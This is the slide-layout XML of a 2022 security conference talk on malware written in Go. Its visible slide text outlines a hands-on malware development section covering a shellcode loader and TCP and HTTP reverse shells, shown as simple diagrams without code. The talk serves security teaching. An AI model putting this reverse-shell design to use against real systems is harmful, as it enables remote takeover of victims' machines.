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Roboto Mono Medium"/>
      <p:regular r:id="rId31"/>
      <p:bold r:id="rId32"/>
      <p:italic r:id="rId33"/>
      <p:boldItalic r:id="rId34"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono Light"/>
      <p:regular r:id="rId35"/>
      <p:bold r:id="rId36"/>
      <p:italic r:id="rId37"/>
      <p:boldItalic r:id="rId38"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto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6">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="551">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="3" pos="7129">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" orient="horz" pos="3861">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="663">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" orient="horz" pos="3657">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" orient="horz" pos="1275">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="8" orient="horz" pos="1616">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="9" orient="horz" pos="935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jAGw4Kxoqw4Pnjd7HwkCS7yQqx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6" orient="horz"/>
        <p:guide pos="551"/>
        <p:guide pos="7129"/>
        <p:guide pos="3861" orient="horz"/>
        <p:guide pos="663" orient="horz"/>
        <p:guide pos="3657" orient="horz"/>
        <p:guide pos="1275" orient="horz"/>
        <p:guide pos="1616" orient="horz"/>
        <p:guide pos="93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Medium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onoMedium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Medium-bold.fntdata"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoLight-regular.fntdata"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono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Light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Light-bold.fntdata"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide12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38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono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84b9ba28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1684b9ba283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84b9ba283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1684b9ba283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749650b3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16749650b3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749650b37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16749650b37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3cfafd9d1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163cfafd9d1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3d2b3b0f7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163d2b3b0f7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500817a65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16500817a65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6500817a65_2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16500817a65_2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63cfafd9d1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163cfafd9d1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a8f0ce73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14a8f0ce73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3cfafd9d1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163cfafd9d1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3d2b3b0f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163d2b3b0f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3d2b3b0f7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163d2b3b0f7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63d2b3b0f7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163d2b3b0f7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3d2b3b0f7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163d2b3b0f7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63d2b3b0f7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163d2b3b0f7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a8f0ce735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4a8f0ce735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a8f0ce735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14a8f0ce735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3cfafd9d1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163cfafd9d1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84b9ba283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1684b9ba283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84b9ba28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1684b9ba28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84b9ba28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1684b9ba28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84b9ba283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1684b9ba283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1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"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7201091" y="6150597"/>
            <a:ext cx="0" cy="2334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26943" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="777821" y="556310"/>
            <a:ext cx="2893866" cy="98410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874725" y="2024075"/>
            <a:ext cx="615060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l-PL" sz="2400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00FE50"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>C:\&gt;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l-PL" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Made in Golang:</a:t>
            </a:r>
            <a:endParaRPr b="1"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l-PL" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>next generation of threats</a:t>
            </a:r>
            <a:endParaRPr b="1"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br>
              <a:rPr b="1" lang="pl-PL" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
            </a:b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l-PL" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="00F750"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jakub Lutczyn</a:t>
            </a:r>
            <a:endParaRPr sz="9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l-PL" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Independent Researcher @ Red Code Labs</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="pl-PL" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="pl-PL" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="00F750"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Jakub Wróbel</a:t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l-PL" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Engineer @ SalesManago</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="pl-PL" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="pl-PL" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp; Golang Developer @ Red Code Labs</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="pl-PL" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="pl-PL" sz="1900">
                <a:solidFill>
                  <a:srgbClr val="00F750"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Konrad Klawikowski</a:t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l-PL" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Associate Threat Hunter @ WithSecure</a:t>
            </a:r>
            <a:br>
              <a:rPr b="1" lang="pl-PL" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr b="1" lang="pl-PL" sz="1900">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&amp; Offensive Security Researcher @ Red Code Labs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40495" y="6122186"/>
            <a:ext cx="1720512" cy="28224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084877" y="6126310"/>
            <a:ext cx="2024400" cy="314100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="02040D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thehacksummit.com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698382" y="6127378"/>
            <a:ext cx="1601330" cy="313892"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="02040D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13-14/10/2022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746830" y="6045567"/>
            <a:ext cx="1703176" cy="480091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="02040D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PGE Narodowy </a:t>
            </a:r>
            <a:br>
              <a:rPr b="0" i="0" lang="pl-P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l-P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66739" y="6107994"/>
            <a:ext cx="205892" cy="2864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3426944" y="6097252"/>
            <a:ext cx="282935" cy="283020"/>
            <a:chOff x="4583292" y="-1770695"/>
            <a:chExt cx="1509791" cy="1510248"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Google Shape;94;p1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4860639" y="-1159396"/>
              <a:ext cx="239321" cy="239321"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="239321" w="239321">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="241983" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241983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rgbClr val="00FE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2040D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218634" y="-1159396"/>
              <a:ext cx="239321" cy="239321"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="239321" w="239321">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="241942" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241942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rgbClr val="00FE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2040D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5576632" y="-1159396"/>
              <a:ext cx="239321" cy="239321"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="239321" w="239321">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="241980" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241980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rgbClr val="00FE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2040D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860639" y="-801442"/>
              <a:ext cx="239321" cy="239321"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="239321" w="239321">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="241983" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241983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rgbClr val="00FE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2040D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5218632" y="-801439"/>
              <a:ext cx="239321" cy="239321"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="239321" w="239321">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="241942" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241942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rgbClr val="00FE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2040D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576632" y="-801442"/>
              <a:ext cx="239321" cy="239321"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="239321" w="239321">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="241980" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="241980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rgbClr val="00FE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2040D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5611942" y="-1770695"/>
              <a:ext cx="171365" cy="239321"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="239321" w="171365">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="171413" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171413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rgbClr val="00FE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2040D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895905" y="-1770695"/>
              <a:ext cx="171365" cy="239321"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="239321" w="171365">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="171448" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171448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rgbClr val="00FE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2040D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583292" y="-1637281"/>
              <a:ext cx="1509791" cy="1376834"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1376834" w="1509791">
                  <a:moveTo>
                    <a:pt x="1512669" y="195732"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1512669" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265557" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265557" y="174131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="963055" y="174131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="963055" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549573" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="549573" y="174131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247065" y="174131"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="247065" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1379278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1512672" y="1379278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1512672" y="195732"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1341221" y="1207824"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="171451" y="1207824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171451" y="347887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1341221" y="347887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1341221" y="1207824"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="00FE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2040D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03" name="Google Shape;103;p1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804378" y="6092504"/>
            <a:ext cx="291465" cy="291465"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="457200" w="457200">
                <a:moveTo>
                  <a:pt x="228600" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="102348" y="0"/>
                  <a:pt x="0" y="102348"/>
                  <a:pt x="0" y="228600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="354852"/>
                  <a:pt x="102348" y="457200"/>
                  <a:pt x="228600" y="457200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="354852" y="457200"/>
                  <a:pt x="457200" y="354852"/>
                  <a:pt x="457200" y="228600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="457200" y="102348"/>
                  <a:pt x="354852" y="0"/>
                  <a:pt x="228600" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="398526" y="314325"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="335185" y="314325"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="339417" y="292323"/>
                  <a:pt x="341995" y="270037"/>
                  <a:pt x="342900" y="247650"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="418148" y="247650"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="415766" y="270893"/>
                  <a:pt x="409114" y="293497"/>
                  <a:pt x="398526" y="314325"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="172212" y="352425"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="284988" y="352425"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="252984" y="440722"/>
                  <a:pt x="204311" y="440817"/>
                  <a:pt x="172212" y="352425"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="161354" y="314325"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="156645" y="292380"/>
                  <a:pt x="153810" y="270075"/>
                  <a:pt x="152876" y="247650"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="304800" y="247650"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="303867" y="270075"/>
                  <a:pt x="301031" y="292380"/>
                  <a:pt x="296323" y="314325"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="58674" y="142875"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="122015" y="142875"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="117783" y="164877"/>
                  <a:pt x="115205" y="187163"/>
                  <a:pt x="114300" y="209550"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="39053" y="209550"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="41434" y="186307"/>
                  <a:pt x="48086" y="163703"/>
                  <a:pt x="58674" y="142875"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="284988" y="104775"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="172212" y="104775"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="204216" y="16478"/>
                  <a:pt x="252889" y="16383"/>
                  <a:pt x="284988" y="104775"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="295847" y="142875"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="300715" y="164806"/>
                  <a:pt x="303710" y="187111"/>
                  <a:pt x="304800" y="209550"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="152876" y="209550"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="153810" y="187125"/>
                  <a:pt x="156645" y="164820"/>
                  <a:pt x="161354" y="142875"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="39053" y="247650"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="114300" y="247650"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="115079" y="270027"/>
                  <a:pt x="117531" y="292314"/>
                  <a:pt x="121634" y="314325"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="58674" y="314325"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="48086" y="293497"/>
                  <a:pt x="41434" y="270893"/>
                  <a:pt x="39053" y="247650"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="342900" y="209550"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="342121" y="187173"/>
                  <a:pt x="339669" y="164886"/>
                  <a:pt x="335566" y="142875"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="398907" y="142875"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="409495" y="163703"/>
                  <a:pt x="416147" y="186307"/>
                  <a:pt x="418529" y="209550"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="373475" y="104775"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="325850" y="104775"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="320494" y="86941"/>
                  <a:pt x="313112" y="69779"/>
                  <a:pt x="303848" y="53626"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="330517" y="65192"/>
                  <a:pt x="354199" y="82685"/>
                  <a:pt x="373094" y="104775"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="153448" y="53626"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="144184" y="69779"/>
                  <a:pt x="136801" y="86941"/>
                  <a:pt x="131445" y="104775"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="83820" y="104775"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="102824" y="82638"/>
                  <a:pt x="126641" y="65142"/>
                  <a:pt x="153448" y="53626"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="84106" y="352425"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="131731" y="352425"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="137087" y="370260"/>
                  <a:pt x="144469" y="387421"/>
                  <a:pt x="153734" y="403574"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="126926" y="392059"/>
                  <a:pt x="103110" y="374562"/>
                  <a:pt x="84106" y="352425"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="303752" y="403574"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="313016" y="387421"/>
                  <a:pt x="320399" y="370260"/>
                  <a:pt x="325755" y="352425"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="373380" y="352425"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="354376" y="374562"/>
                  <a:pt x="330558" y="392059"/>
                  <a:pt x="303752" y="403574"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="00FE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040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7368119" y="6198054"/>
            <a:ext cx="13401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E50"/>
              </a:buClr>
              <a:buSzPts val="1000"/>
              <a:buFont typeface="Verdana"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" i="0" lang="pl-PL" sz="1000" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="00FE50"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>ORGANIZERS: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24703" y="313643"/>
            <a:ext cx="4889476" cy="4586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54039" y="5868475"/>
            <a:ext cx="765496" cy="765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1684b9ba283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2437"/>
            <a:ext cx="11887200" cy="521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684b9ba283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88" y="702100"/>
            <a:ext cx="11156425" cy="54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16749650b3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50" y="1276350"/>
            <a:ext cx="4257675" cy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6749650b37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950" y="1786250"/>
            <a:ext cx="7477126" cy="3285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16749650b37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600" y="162775"/>
            <a:ext cx="6716799" cy="653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3cfafd9d1_0_14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1893150" y="2565400"/>
            <a:ext cx="8405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section</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="pl-PL" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="00F750"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="pl-PL" sz="3200">
                <a:solidFill>
                  <a:srgbClr val="00F750"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>HANDS-ON_MALWARE_DEVELOPMENT</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:srgbClr val="00F7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" name="Google Shape;187;g163cfafd9d1_0_14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1893150" y="3326725"/>
            <a:ext cx="76905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ono"/>
              <a:buChar char="●"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HTTP(s) reverse shell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ono"/>
              <a:buChar char="●"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shellcode loader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3d2b3b0f7_0_8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2933250" y="2789950"/>
            <a:ext cx="6325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9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file:///</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="pl-PL" sz="2900">
                <a:solidFill>
                  <a:srgbClr val="00F750"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>REVERSE_SHELL</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="pl-PL" sz="29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.go</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="29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16500817a65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12" y="6280461"/>
            <a:ext cx="991344" cy="31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g16500817a65_2_0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4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g16500817a65_2_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8567737" y="6400366"/>
            <a:ext cx="2743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6500817a65_2_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639850" y="465325"/>
            <a:ext cx="4809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900">
                <a:solidFill>
                  <a:srgbClr val="00F750"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>TCP reverse shell</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:srgbClr val="00F7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1" name="Google Shape;201;g16500817a65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8263" y="2213975"/>
            <a:ext cx="917350" cy="9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6500817a65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8363" y="2213975"/>
            <a:ext cx="917350" cy="9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16500817a65_2_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3734088" y="3261325"/>
            <a:ext cx="8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stdin</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt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04" name="Google Shape;204;g16500817a65_2_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6880338" y="3261325"/>
            <a:ext cx="16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exec(command)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="205" name="Google Shape;205;g16500817a65_2_0"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="203" idx="3"/>
            <a:endCxn id="204" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4585188" y="3461425"/>
            <a:ext cx="22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g16500817a65_2_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6824088" y="4243825"/>
            <a:ext cx="17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command stdout</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="207" name="Google Shape;207;g16500817a65_2_0"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="206" idx="1"/>
            <a:endCxn id="208" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="4585188" y="4443925"/>
            <a:ext cx="22389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g16500817a65_2_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3734088" y="4243825"/>
            <a:ext cx="8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stdout</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="lt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09" name="Google Shape;209;g16500817a65_2_0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5081334" y="3752575"/>
            <a:ext cx="14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-PL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tcp channel</a:t>
            </a:r>
            <a:endParaRPr i="1">
              <a:solidFill>
                <a:schemeClr val="lt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16500817a65_2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12" y="6280461"/>
            <a:ext cx="991344" cy="31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g16500817a65_2_22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4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g16500817a65_2_22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8567737" y="6400366"/>
            <a:ext cx="2743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6500817a65_2_22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="639850" y="465325"/>
            <a:ext cx="4809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900">
                <a:solidFill>
                  <a:srgbClr val="00F750"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>HTTP reverse shell</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:srgbClr val="00F7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18" name="Google Shape;218;g16500817a65_2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950" y="1838488"/>
            <a:ext cx="917350" cy="9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6500817a65_2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55975" y="1565400"/>
            <a:ext cx="917350" cy="9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6500817a65_2_22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1627675" y="1326538"/>
            <a:ext cx="14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-PL">
                <a:solidFill>
                  <a:schemeClr val="lt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HTTP server</a:t>
